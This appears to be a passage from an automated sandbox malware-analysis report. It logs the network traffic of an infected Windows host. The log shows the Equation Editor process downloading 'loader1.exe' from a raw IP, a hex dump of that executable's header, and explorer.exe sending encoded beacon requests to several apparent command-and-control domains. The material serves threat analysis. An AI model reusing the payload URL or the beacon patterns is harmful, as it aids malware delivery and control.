                                                                                                                                                          Jul 22, 2021 17:23:20.608289003 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.608289003 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.608326912 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.608340025 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.608365059 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.608371019 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.608405113 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.608407974 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.608443022 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.608447075 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.608480930 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.608484030 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.608519077 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.608520031 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.608553886 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.608553886 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.608589888 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.608593941 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.608624935 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.608634949 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.608659029 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.608675957 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.608705044 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.608738899 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.610814095 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.610846996 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.610872984 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.610899925 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.610925913 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.610951900 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.610979080 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.610996008 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.611018896 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.611022949 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.611056089 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.611088037 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.612185955 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                          Jul 22, 2021 17:23:20.809575081 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.809622049 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.809642076 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.809663057 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.809683084 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:23:20.809709072 CEST8049167192.210.173.40192.168.2.22

                                                                                                                                                          UDP Packets

                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Jul 22, 2021 17:24:37.200670004 CEST5219753192.168.2.228.8.8.8
                                                                                                                                                          Jul 22, 2021 17:24:37.377166986 CEST53521978.8.8.8192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:24:42.742911100 CEST5309953192.168.2.228.8.8.8
                                                                                                                                                          Jul 22, 2021 17:24:42.807352066 CEST53530998.8.8.8192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:24:48.295579910 CEST5283853192.168.2.228.8.8.8
                                                                                                                                                          Jul 22, 2021 17:24:48.368793964 CEST53528388.8.8.8192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:24:53.782813072 CEST6120053192.168.2.228.8.8.8
                                                                                                                                                          Jul 22, 2021 17:24:53.860035896 CEST53612008.8.8.8192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:24:58.996340990 CEST4954853192.168.2.228.8.8.8
                                                                                                                                                          Jul 22, 2021 17:24:59.053472042 CEST53495488.8.8.8192.168.2.22
                                                                                                                                                          Jul 22, 2021 17:25:04.170917988 CEST5562753192.168.2.228.8.8.8
                                                                                                                                                          Jul 22, 2021 17:25:04.237020969 CEST53556278.8.8.8192.168.2.22

                                                                                                                                                          DNS Queries

                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                          Jul 22, 2021 17:24:37.200670004 CEST192.168.2.228.8.8.80xccffStandard query (0)www.anthonysavillemiddleschool.comA (IP address)IN (0x0001)
                                                                                                                                                          Jul 22, 2021 17:24:42.742911100 CEST192.168.2.228.8.8.80x2e78Standard query (0)www.envisionfordheights.comA (IP address)IN (0x0001)
                                                                                                                                                          Jul 22, 2021 17:24:48.295579910 CEST192.168.2.228.8.8.80x2f03Standard query (0)www.melodezu.comA (IP address)IN (0x0001)
                                                                                                                                                          Jul 22, 2021 17:24:53.782813072 CEST192.168.2.228.8.8.80x3c4eStandard query (0)www.scuolatua.comA (IP address)IN (0x0001)
                                                                                                                                                          Jul 22, 2021 17:24:58.996340990 CEST192.168.2.228.8.8.80x6ec7Standard query (0)www.theshapecreator.comA (IP address)IN (0x0001)
                                                                                                                                                          Jul 22, 2021 17:25:04.170917988 CEST192.168.2.228.8.8.80xf09aStandard query (0)www.sprinkleresources.comA (IP address)IN (0x0001)

                                                                                                                                                          DNS Answers

                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                          Jul 22, 2021 17:24:37.377166986 CEST8.8.8.8192.168.2.220xccffNo error (0)www.anthonysavillemiddleschool.com173.255.194.134A (IP address)IN (0x0001)
                                                                                                                                                          Jul 22, 2021 17:24:37.377166986 CEST8.8.8.8192.168.2.220xccffNo error (0)www.anthonysavillemiddleschool.com72.14.178.174A (IP address)IN (0x0001)
                                                                                                                                                          Jul 22, 2021 17:24:37.377166986 CEST8.8.8.8192.168.2.220xccffNo error (0)www.anthonysavillemiddleschool.com45.33.18.44A (IP address)IN (0x0001)
                                                                                                                                                          Jul 22, 2021 17:24:37.377166986 CEST8.8.8.8192.168.2.220xccffNo error (0)www.anthonysavillemiddleschool.com45.33.30.197A (IP address)IN (0x0001)
                                                                                                                                                          Jul 22, 2021 17:24:37.377166986 CEST8.8.8.8192.168.2.220xccffNo error (0)www.anthonysavillemiddleschool.com72.14.185.43A (IP address)IN (0x0001)
                                                                                                                                                          Jul 22, 2021 17:24:37.377166986 CEST8.8.8.8192.168.2.220xccffNo error (0)www.anthonysavillemiddleschool.com96.126.123.244A (IP address)IN (0x0001)
                                                                                                                                                          Jul 22, 2021 17:24:37.377166986 CEST8.8.8.8192.168.2.220xccffNo error (0)www.anthonysavillemiddleschool.com45.33.2.79A (IP address)IN (0x0001)
                                                                                                                                                          Jul 22, 2021 17:24:37.377166986 CEST8.8.8.8192.168.2.220xccffNo error (0)www.anthonysavillemiddleschool.com45.33.20.235A (IP address)IN (0x0001)
                                                                                                                                                          Jul 22, 2021 17:24:37.377166986 CEST8.8.8.8192.168.2.220xccffNo error (0)www.anthonysavillemiddleschool.com45.79.19.196A (IP address)IN (0x0001)
                                                                                                                                                          Jul 22, 2021 17:24:37.377166986 CEST8.8.8.8192.168.2.220xccffNo error (0)www.anthonysavillemiddleschool.com198.58.118.167A (IP address)IN (0x0001)
                                                                                                                                                          Jul 22, 2021 17:24:37.377166986 CEST8.8.8.8192.168.2.220xccffNo error (0)www.anthonysavillemiddleschool.com45.56.79.23A (IP address)IN (0x0001)
                                                                                                                                                          Jul 22, 2021 17:24:37.377166986 CEST8.8.8.8192.168.2.220xccffNo error (0)www.anthonysavillemiddleschool.com45.33.23.183A (IP address)IN (0x0001)
                                                                                                                                                          Jul 22, 2021 17:24:42.807352066 CEST8.8.8.8192.168.2.220x2e78No error (0)www.envisionfordheights.comenvisionfordheights.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                          Jul 22, 2021 17:24:42.807352066 CEST8.8.8.8192.168.2.220x2e78No error (0)envisionfordheights.com184.168.131.241A (IP address)IN (0x0001)
                                                                                                                                                          Jul 22, 2021 17:24:48.368793964 CEST8.8.8.8192.168.2.220x2f03No error (0)www.melodezu.commelodezu.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                          Jul 22, 2021 17:24:48.368793964 CEST8.8.8.8192.168.2.220x2f03No error (0)melodezu.com64.227.87.162A (IP address)IN (0x0001)
                                                                                                                                                          Jul 22, 2021 17:24:53.860035896 CEST8.8.8.8192.168.2.220x3c4eNo error (0)www.scuolatua.com62.149.128.40A (IP address)IN (0x0001)
                                                                                                                                                          Jul 22, 2021 17:24:59.053472042 CEST8.8.8.8192.168.2.220x6ec7No error (0)www.theshapecreator.com217.160.0.194A (IP address)IN (0x0001)
                                                                                                                                                          Jul 22, 2021 17:25:04.237020969 CEST8.8.8.8192.168.2.220xf09aNo error (0)www.sprinkleresources.comsprinkleresources.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                          Jul 22, 2021 17:25:04.237020969 CEST8.8.8.8192.168.2.220xf09aNo error (0)sprinkleresources.com78.47.57.7A (IP address)IN (0x0001)

                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                          • 192.210.173.40
                                                                                                                                                          • www.anthonysavillemiddleschool.com
                                                                                                                                                          • www.envisionfordheights.com
                                                                                                                                                          • www.melodezu.com
                                                                                                                                                          • www.scuolatua.com
                                                                                                                                                          • www.theshapecreator.com

                                                                                                                                                          HTTP Packets

                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                          0192.168.2.2249167192.210.173.4080C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                          Jul 22, 2021 17:23:19.807858944 CEST0OUTGET /files/loader1.exe HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                          Host: 192.210.173.40
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jul 22, 2021 17:23:20.009445906 CEST1INHTTP/1.1 200 OK
                                                                                                                                                          Date: Thu, 22 Jul 2021 15:23:19 GMT
                                                                                                                                                          Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                                                                                                                                                          Last-Modified: Thu, 22 Jul 2021 14:21:45 GMT
                                                                                                                                                          ETag: "2e1d9-5c7b701c11d26"
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Content-Length: 188889
                                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: application/x-msdownload
                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6c 05 02 7b 28 64 6c 28 28 64 6c 28 28 64 6c 28 c0 7b 67 28 29 64 6c 28 ab 78 62 28 20 64 6c 28 c0 7b 66 28 3f 64 6c 28 21 1c ff 28 23 64 6c 28 28 64 6d 28 16 64 6c 28 21 1c ef 28 29 64 6c 28 21 1c fd 28 29 64 6c 28 52 69 63 68 28 64 6c 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f0 7e f9 60 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 36 00 00 00 12 00 00 00 00 00 00 5a 20 00 00 00 10 00 00 00 50 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 70 00 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 54 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1c 34 00 00 00 10 00 00 00 36 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 64 09 00 00 00 50 00 00 00 0a 00 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 06 00 00 00 60 00 00 00 04 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$l{(dl((dl((dl({g()dl(xb( dl({f(?dl(!(#dl((dm(dl(!()dl(!()dl(Rich(dl(PEL~`6Z P@p0TxP.text46 `.rdatadP:@@.data`D@


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                          1192.168.2.2249168173.255.194.13480C:\Windows\explorer.exe
                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                          Jul 22, 2021 17:24:37.561999083 CEST199OUTGET /dy8g/?m4=JhkpqhXpG6AL&f6AxB=rwgJraFzZp/V2q8u2Shj6R3C57WQypzH7HaIjADLKjfnthexEKyoQAtUw623G0BOv3Gwbg== HTTP/1.1
                                                                                                                                                          Host: www.anthonysavillemiddleschool.com
                                                                                                                                                          Connection: close
                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii:
                                                                                                                                                          Jul 22, 2021 17:24:37.735676050 CEST200INHTTP/1.1 200 OK
                                                                                                                                                          server: openresty/1.13.6.1
                                                                                                                                                          date: Thu, 22 Jul 2021 15:24:37 GMT
                                                                                                                                                          content-type: text/html; charset=utf-8
                                                                                                                                                          content-length: 1946
                                                                                                                                                          vary: Accept-Language
                                                                                                                                                          content-language: en
                                                                                                                                                          connection: close
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 76 61 72 20 70 20 3d 20 22 2e 65 4a 77 4e 7a 62 73 4f 67 6a 41 41 51 4e 46 5f 36 65 42 6b 77 49 41 57 59 73 49 41 50 6b 41 67 4d 57 68 38 78 4d 56 55 4b 42 51 73 46 4d 71 6a 6f 50 48 66 37 58 69 47 6d 5f 73 46 50 63 5f 42 47 71 6a 4a 5a 47 59 71 6d 41 50 45 73 31 61 36 58 46 6f 2d 65 64 63 4e 75 64 63 75 74 4d 4e 5a 43 75 33 52 73 62 6a 49 66 49 37 32 6e 30 65 74 58 72 58 47 37 4c 55 7a 4b 65 42 4a 33 36 79 4d 57 7a 54 56 48 38 5f 77 30 4b 47 77 74 32 46 51 70 46 56 48 38 4c 67 4c 4a 68 62 5a 33 55 56 41 54 58 63 58 7a 6e 48 51 58 66 48 4b 4c 45 74 2d 4f 45 34 78 78 31 79 75 4a 41 68 72 75 32 65 46 53 69 77 70 68 46 43 51 72 46 6b 31 74 57 6a 49 4b 63 56 6c 6e 69 51 55 74 7a 46 68 6a 43 6f 78 4b 38 48 76 44 5f 61 43 50 52 6f 3a 31 6d 36 61 59 76 3a 69 76 2d 55 48 39 71 39 6b 33 4c 50 35 4f 70 43 7a 55 6c 32 77 52 54 34 32 6a 67 22 2c 20 61 73 20 3d 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 6e 74 68 6f 6e 79 73 61 76 69 6c 6c 65 6d 69 64 64 6c 65 73 63 68 6f 6f 6c 2e 63 6f 6d 2f 6d 74 6d 2f 61 73 79 6e 63 2f 22 3b 66 75 6e 63 74 69 6f 6e 20 64 28 6e 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 68 74 74 70 3a 2f 2f 77 77 77 34 32 2e 61 6e 74 68 6f 6e 79 73 61 76 69 6c 6c 65 6d 69 64 64 6c 65 73 63 68 6f 6f 6c 2e 63 6f 6d 2f 22 2b 6e 3b 7d 66 75 6e 63 74 69 6f 6e 20 61 72 28 72 29 20 7b 69 66 20 28 72 2e 73 6c 69 63 65 28 30 2c 20 31 29 20 21 3d 3d 20 22 2e 22 29 20 7b 74 72 79 20 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 61 73 73 69 67 6e 28 72 29 3b 7d 20 63 61 74 63 68 20 28 65 72 72 29 20 7b 7d 74 72 79 20 7b 76 61 72 20 6d 61 72 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 6d 65 74 61 22 29 3b 6d 61 72 2e 68 74 74 70 45 71 75 69 76 20 3d 20 22 72 65 66 72 65 73 68 22 3b 6d 61 72 2e 63 6f 6e 74 65 6e 74 20 3d 20 22 30 3b 75 72 6c 3d 22 2b 72 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 65 61 64 22 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6d 61 72 29 3b 7d 20 63 61 74 63 68 20 28 65 72 72 29 20 7b 7d 7d 20 65 6c 73 65 20 7b 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 70 61 6e 22 29 3b 73 2e 69 64 3d 22 65 63 6f 64 65 22 3b 73 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 54 65 78 74 4e 6f 64 65 28 72 2e 73 6c 69 63 65 28 31 29 29 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 62 6f 64 79 22 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 29 3b 7d 7d 69 66 20 28 22 66 65 74 63 68 22 20 69 6e 20 77 69 6e 64 6f 77 29 20 7b 74 72 79 20 7b 66 65 74 63 68 28 61 73 20 2b 20 70 20 2b 20 22 2f 31 22 2c 20 7b 63 72 65 64 65 6e 74 69 61 6c 73 3a 20 22 69 6e 63 6c 75 64 65 22 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 72 29 20 7b 69 66 20 28 21 72 2e 6f 6b 29 20 7b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 35 30 78 22 29 3b 7d 72 65
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="x-ua-compatible" content="IE=edge"><title></title><script type="text/javascript">(function() {var p = ".eJwNzbsOgjAAQNF_6eBkwIAWYsIAPkAgMWh8xMVUKBQsFMqjoPHf7XiGm_sFPc_BGqjJZGYqmAPEs1a6XFo-edcNudcutMNZCu3RsbjIfI72n0etXrXG7LUzKeBJ36yMWzTVH8_w0KGwt2FQpFVH8LgLJhbZ3UVATXcXznHQXfHKLEt-OE4xx1yuJAhru2eFSiwphFCQrFk1tWjIKcVlniQUtzFhjCoxK8HvD_aCPRo:1m6aYv:iv-UH9q9k3LP5OpCzUl2wRT42jg", as = "http://www.anthonysavillemiddleschool.com/mtm/async/";function d(n){window.location.href = "http://www42.anthonysavillemiddleschool.com/"+n;}function ar(r) {if (r.slice(0, 1) !== ".") {try {window.location.assign(r);} catch (err) {}try {var mar = document.createElement("meta");mar.httpEquiv = "refresh";mar.content = "0;url="+r;document.getElementsByTagName("head")[0].appendChild(mar);} catch (err) {}} else {var s = document.createElement("span");s.id="ecode";s.appendChild(document.createTextNode(r.slice(1)));document.getElementsByTagName("body")[0].appendChild(s);}}if ("fetch" in window) {try {fetch(as + p + "/1", {credentials: "include"}).then(function(r) {if (!r.ok) {throw Error("50x");}re


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                          2192.168.2.2249169184.168.131.24180C:\Windows\explorer.exe
                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                          Jul 22, 2021 17:24:43.004930019 CEST202OUTGET /dy8g/?f6AxB=vVE1EPQ0UVj9kOe8VQ0nVcRzGfWXkz9RjMJXc7yWSGpHU8pWW617eZYhUx3ojEq6OYTq+w==&m4=JhkpqhXpG6AL HTTP/1.1
                                                                                                                                                          Host: www.envisionfordheights.com
                                                                                                                                                          Connection: close
                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii:
                                                                                                                                                          Jul 22, 2021 17:24:43.281547070 CEST202INHTTP/1.1 301 Moved Permanently
                                                                                                                                                          Server: nginx/1.16.1
                                                                                                                                                          Date: Thu, 22 Jul 2021 15:24:43 GMT
                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Location: https://storymaps.arcgis.com/stories/c29b9f6d46004afda7c8a39378498384?f6AxB=vVE1EPQ0UVj9kOe8VQ0nVcRzGfWXkz9RjMJXc7yWSGpHU8pWW617eZYhUx3ojEq6OYTq+w==&m4=JhkpqhXpG6AL
                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                          3192.168.2.224917064.227.87.16280C:\Windows\explorer.exe
                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                          Jul 22, 2021 17:24:48.561279058 CEST203OUTGET /dy8g/?m4=JhkpqhXpG6AL&f6AxB=qBaU/+yaefHhIJkiEPofXU4iidVfFInHYvzb5F8Pi5TSlEQo4YuA2EgGVMsttPV3rTFjAQ== HTTP/1.1
                                                                                                                                                          Host: www.melodezu.com
                                                                                                                                                          Connection: close
                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii:
                                                                                                                                                          Jul 22, 2021 17:24:48.751496077 CEST204INHTTP/1.1 404 Not Found
                                                                                                                                                          Date: Thu, 22 Jul 2021 15:24:48 GMT
                                                                                                                                                          Server: Apache/2.4.18 (Ubuntu)
                                                                                                                                                          Content-Length: 278
                                                                                                                                                          Connection: close
                                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 65 6c 6f 64 65 7a 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at www.melodezu.com Port 80</address></body></html>


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                          4192.168.2.224917162.149.128.4080C:\Windows\explorer.exe
                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                          Jul 22, 2021 17:24:53.925981998 CEST205OUTGET /dy8g/?f6AxB=DyFQJ288GFHSDaRVmYvFextRb5KpVMjfJi9S0KMeos3/VwrcWYQUkgom+EPLcL1jkg9ePA==&m4=JhkpqhXpG6AL HTTP/1.1
                                                                                                                                                          Host: www.scuolatua.com
                                                                                                                                                          Connection: close
                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii:
                                                                                                                                                          Jul 22, 2021 17:24:53.990124941 CEST206INHTTP/1.1 404 Not Found
                                                                                                                                                          Cache-Control: private
                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                          Server: Microsoft-IIS/8.5
                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                          Date: Thu, 22 Jul 2021 15:24:53 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          Content-Length: 5045
